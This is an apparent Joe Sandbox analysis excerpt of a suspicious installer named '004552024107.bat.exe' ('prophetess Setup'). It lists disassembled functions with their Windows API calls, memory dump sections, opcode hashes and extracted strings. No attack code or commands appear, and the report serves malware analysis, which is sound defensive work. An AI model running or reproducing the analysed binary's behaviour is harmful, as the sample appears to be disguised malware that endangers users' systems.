                                            • Instruction Fuzzy Hash: D0E18B7190470ACFDB24CF58C880BAAB7F1FB44305F15842EE497A72D1E738AA95CB14
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8d4d4038b428717fbb616dadee5392a57e0a8d9c6ebddc8936aa8167a04c56aa
                                            • Instruction ID: 112ec8b08e22b9c6c3aeb56eb94a2e19ac2cef272eed527e1014fed5102c6f46
                                            • Opcode Fuzzy Hash: 8d4d4038b428717fbb616dadee5392a57e0a8d9c6ebddc8936aa8167a04c56aa
                                            • Instruction Fuzzy Hash: 33C13631E04219DBCF18CF68D8905EEBBB2BF98314F25866AD85677380D734A942CF95
                                            APIs
                                            • GetDlgItem.USER32(?,000003F9), ref: 00404D49
                                            • GetDlgItem.USER32(?,00000408), ref: 00404D56
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404DA5
                                            • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404DBC
                                            • SetWindowLongA.USER32(?,000000FC,00405345), ref: 00404DD6
                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404DE8
                                            • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DFC
                                            • SendMessageA.USER32(?,00001109,00000002), ref: 00404E12
                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404E1E
                                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404E2E
                                            • DeleteObject.GDI32(00000110), ref: 00404E33
                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E5E
                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E6A
                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F04
                                            • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404F34
                                              • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F48
                                            • GetWindowLongA.USER32(?,000000F0), ref: 00404F76
                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404F84
                                            • ShowWindow.USER32(?,00000005), ref: 00404F94
                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 0040508F
                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004050F4
                                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00405109
                                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 0040512D
                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 0040514D
                                            • ImageList_Destroy.COMCTL32(?), ref: 00405162
                                            • GlobalFree.KERNEL32(?), ref: 00405172
                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004051EB
                                            • SendMessageA.USER32(?,00001102,?,?), ref: 00405294
                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004052A3
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004052CE
                                            • ShowWindow.USER32(?,00000000), ref: 0040531C
                                            • GetDlgItem.USER32(?,000003FE), ref: 00405327
                                            • ShowWindow.USER32(00000000), ref: 0040532E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                            • String ID: $79~$M$N
                                            • API String ID: 2564846305-638173821
                                            • Opcode ID: 4df1eefe35e68a6c7fa34c5b60be6288f9ea88f6771e326f729b6c61956ac8d6
                                            • Instruction ID: b1cb089e499fd84ad02b8b6dcb50706d58213328e80d7969948961eab3192630
                                            • Opcode Fuzzy Hash: 4df1eefe35e68a6c7fa34c5b60be6288f9ea88f6771e326f729b6c61956ac8d6
                                            • Instruction Fuzzy Hash: B1027DB0A00609AFDF209F94DD45AAE7BB5FB44354F50817AFA10BA2E1C7789D42CF58
                                            APIs
                                            • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404523
                                            • GetDlgItem.USER32(00000000,000003E8), ref: 00404537
                                            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404555
                                            • GetSysColor.USER32(?), ref: 00404566
                                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404575
                                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404584
                                            • lstrlenA.KERNEL32(?), ref: 00404587
                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404596
                                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004045AB
                                            • GetDlgItem.USER32(?,0000040A), ref: 0040460D
                                            • SendMessageA.USER32(00000000), ref: 00404610
                                            • GetDlgItem.USER32(?,000003E8), ref: 0040463B
                                            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040467B
                                            • LoadCursorA.USER32(00000000,00007F02), ref: 0040468A
                                            • SetCursor.USER32(00000000), ref: 00404693
                                            • LoadCursorA.USER32(00000000,00007F00), ref: 004046A9
                                            • SetCursor.USER32(00000000), ref: 004046AC
                                            • SendMessageA.USER32(00000111,00000001,00000000), ref: 004046D8
                                            • SendMessageA.USER32(00000010,00000000,00000000), ref: 004046EC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                            • String ID: 79~$Call$N$cD@
                                            • API String ID: 3103080414-1833124707
                                            • Opcode ID: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                                            • Instruction ID: 43684ccacc2d8fb7b4e0a1eb44f66cc69a0b9750f41782283b4d1566cbdab7d9
                                            • Opcode Fuzzy Hash: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                                            • Instruction Fuzzy Hash: 106193B1A00209BBDB109F61DD45F6A3BA9FB84754F10443AFB057B1D1C7B8A951CF98
                                            APIs
                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                            • BeginPaint.USER32(?,?), ref: 00401047
                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                            • DeleteObject.GDI32(?), ref: 004010ED
                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                            • DrawTextA.USER32(00000000,prophetess Setup,000000FF,00000010,00000820), ref: 00401156
                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                            • DeleteObject.GDI32(?), ref: 00401165
                                            • EndPaint.USER32(?,?), ref: 0040116E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                            • String ID: F$prophetess Setup
                                            • API String ID: 941294808-2747703229
                                            • Opcode ID: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                            • Instruction ID: 3ddd31971ff36fa992edb7b0d2f538087f25d398410520a6441e316a3758f4e4
                                            • Opcode Fuzzy Hash: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                            • Instruction Fuzzy Hash: 2E419C71800209AFCB059F95CE459BFBBB9FF44314F00842EF591AA1A0CB349955DFA4
                                            APIs
                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406087,?,?), ref: 00405F27
                                            • GetShortPathNameA.KERNEL32(?,0042C218,00000400), ref: 00405F30
                                              • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                              • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                            • GetShortPathNameA.KERNEL32(?,0042C618,00000400), ref: 00405F4D
                                            • wsprintfA.USER32 ref: 00405F6B
                                            • GetFileSize.KERNEL32(00000000,00000000,0042C618,C0000000,00000004,0042C618,?,?,?,?,?), ref: 00405FA6
                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FB5
                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FED
                                            • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,0042BE18,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00406043
                                            • GlobalFree.KERNEL32(00000000), ref: 00406054
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040605B
                                              • Part of subcall function 00405E20: GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\004552024107.bat.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                              • Part of subcall function 00405E20: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                            • String ID: %s=%s$[Rename]
                                            • API String ID: 2171350718-1727408572
                                            • Opcode ID: 569be3a98da05520ad95d37df462ccc6378b119762144e883bf0616c118c920a
                                            • Instruction ID: da8ce3bfdf00fcfed17b5edaf8d9799a0bf0ff3a482d4f6cc2fc7d52a36fe9c3
                                            • Opcode Fuzzy Hash: 569be3a98da05520ad95d37df462ccc6378b119762144e883bf0616c118c920a
                                            • Instruction Fuzzy Hash: 3D3135312407117BC220AB65AC88F6B3A5CDF41758F16003BFA02F72D2DE7C98558ABD
                                            APIs
                                            • CharNextA.USER32(0000000C,*?|<>/":,00000000,?,76D53410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
                                            • CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,76D53410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
                                            • CharNextA.USER32(0000000C,?,76D53410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
                                            • CharPrevA.USER32(0000000C,0000000C,76D53410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00406601
                                            Strings
                                            • "C:\Users\user\Desktop\004552024107.bat.exe", xrefs: 00406587
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00406588
                                            • *?|<>/":, xrefs: 004065CF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Char$Next$Prev
                                            • String ID: "C:\Users\user\Desktop\004552024107.bat.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 589700163-3309007417
                                            • Opcode ID: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                            • Instruction ID: 9f335943bb0e62a209881404c60ffb6aa99012b8199ff17f999404b9432e9d26
                                            • Opcode Fuzzy Hash: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                            • Instruction Fuzzy Hash: 871104618053923DFB3216282C44B777F894F97760F1A007FE5C2722C6CA7C5C62966D
                                            APIs
                                            • GetWindowLongA.USER32(?,000000EB), ref: 004043B1
                                            • GetSysColor.USER32(00000000), ref: 004043EF
                                            • SetTextColor.GDI32(?,00000000), ref: 004043FB
                                            • SetBkMode.GDI32(?,?), ref: 00404407
                                            • GetSysColor.USER32(?), ref: 0040441A
                                            • SetBkColor.GDI32(?,?), ref: 0040442A
                                            • DeleteObject.GDI32(?), ref: 00404444
                                            • CreateBrushIndirect.GDI32(?), ref: 0040444E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                            • String ID:
                                            • API String ID: 2320649405-0
                                            • Opcode ID: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                            • Instruction ID: 0cb6da092899fbd89936ee00678fc1211e2f1892718b1dfe439ae8b372ce6297
                                            • Opcode Fuzzy Hash: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                            • Instruction Fuzzy Hash: E32177715007049BCF309F78D948B577BF8AF81714B04893DEAA6B26E1C734E948CB58
                                            APIs
                                              • Part of subcall function 6D0E12A5: GlobalAlloc.KERNELBASE(00000040,6D0E12C3,?,6D0E135F,-6D0E504B,6D0E11C0,-000000A0), ref: 6D0E12AD
                                            • GlobalFree.KERNEL32(?), ref: 6D0E266E
                                            • GlobalFree.KERNEL32(00000000), ref: 6D0E26A8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1269749952.000000006D0E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D0E0000, based on PE: true
                                            • Associated: 00000000.00000002.1269707159.000000006D0E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1269794266.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1269831918.000000006D0E6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6d0e0000_004552024107.jbxd
                                            Similarity
                                            • API ID: Global$Free$Alloc
                                            • String ID:
                                            • API String ID: 1780285237-0
                                            • Opcode ID: e0c39917504052fb0a104180c2d17a92b0a9fc3f15c91381faa9a95d1e7f7e20
                                            • Instruction ID: c6b81f8ba0c6d8c689d0791e97861147024fe4397b4e4e12ba22d40f2c3e65c8
                                            • Opcode Fuzzy Hash: e0c39917504052fb0a104180c2d17a92b0a9fc3f15c91381faa9a95d1e7f7e20
                                            • Instruction Fuzzy Hash: E441B172548246EFE7258F64CC88F3E77FAFB8A784B404A2DF65187150CB31D8458B62
                                            APIs
                                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C9B
                                            • GetMessagePos.USER32 ref: 00404CA3
                                            • ScreenToClient.USER32(?,?), ref: 00404CBD
                                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404CCF
                                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404CF5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Message$Send$ClientScreen
                                            • String ID: f
                                            • API String ID: 41195575-1993550816
                                            • Opcode ID: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                            • Instruction ID: 8ac1eb656b69e247d5f05692bef4687e0c0d70a1275d834663b2b8f38aac2a1a
                                            • Opcode Fuzzy Hash: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                            • Instruction Fuzzy Hash: B6019E71900218BAEB00DB94DD81FFFBBBCAF44711F10012BBA01B61C0C7B899418BA4
                                            APIs
                                            • GetDC.USER32(?), ref: 00401E5D
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E77
                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E7F
                                            • ReleaseDC.USER32(?,00000000), ref: 00401E90
                                            • CreateFontIndirectA.GDI32(0040B830), ref: 00401EDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                            • String ID: Tahoma
                                            • API String ID: 3808545654-3580928618
                                            • Opcode ID: 0466c2d66d8f018793a5193256bc33b363c7409b941099693a26df1913abae86
                                            • Instruction ID: 3235dfa2473664f3223cdf9cba53c0ab50ba273bd9661b34cbd5463b8b999ac8
                                            • Opcode Fuzzy Hash: 0466c2d66d8f018793a5193256bc33b363c7409b941099693a26df1913abae86
                                            • Instruction Fuzzy Hash: FE017572504344AFE7107B60AE49B9E3FF8E715701F10897AF181B62F2CB7800058B6D
                                            APIs
                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E65
                                            • MulDiv.KERNEL32(0007C7EA,00000064,0007C7EE), ref: 00402E90
                                            • wsprintfA.USER32 ref: 00402EA0
                                            • SetWindowTextA.USER32(?,?), ref: 00402EB0
                                            • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402EC2
                                            Strings
                                            • verifying installer: %d%%, xrefs: 00402E9A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1246943059.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1246905673.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1246980348.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247016656.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Text$ItemTimerWindowwsprintf
                                            • String ID: verifying installer: %d%%
                                            • API String ID: 1451636040-82062127
                                            • Opcode ID: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                                            • Instruction ID: 08bf30aeaad7c3c0f985f8b81484beb4ade113f1463dbf8d033ac048ea6a4a00
                                            • Opcode Fuzzy Hash: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
